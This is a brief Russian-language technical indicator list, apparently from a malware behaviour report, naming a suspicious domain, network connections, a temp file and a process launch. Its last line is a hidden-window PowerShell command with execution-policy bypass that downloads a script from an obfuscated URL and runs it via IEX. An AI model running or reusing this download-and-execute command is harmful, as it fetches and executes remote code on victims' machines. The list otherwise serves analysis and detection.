Техническая информация
- ht+t+p://giusy+bijo+ux.co+m+/a+ms+s.jp+g
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\524022.cvr
- 'gi###bijoux.com':80
- 'gi###bijoux.com':443
- 'gi###bijoux.com':443
- DNS ASK gi###bijoux.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ex byPASS -NOp -windowstyle hidden -c IEX(New-Object System.Net.WebClient).DownloadString('ht'+'t'+'p://giusy'+'bijo'+'ux.co'+'m'+'/a'+'ms'+'s.jp'+'g')' (со скрытым окном)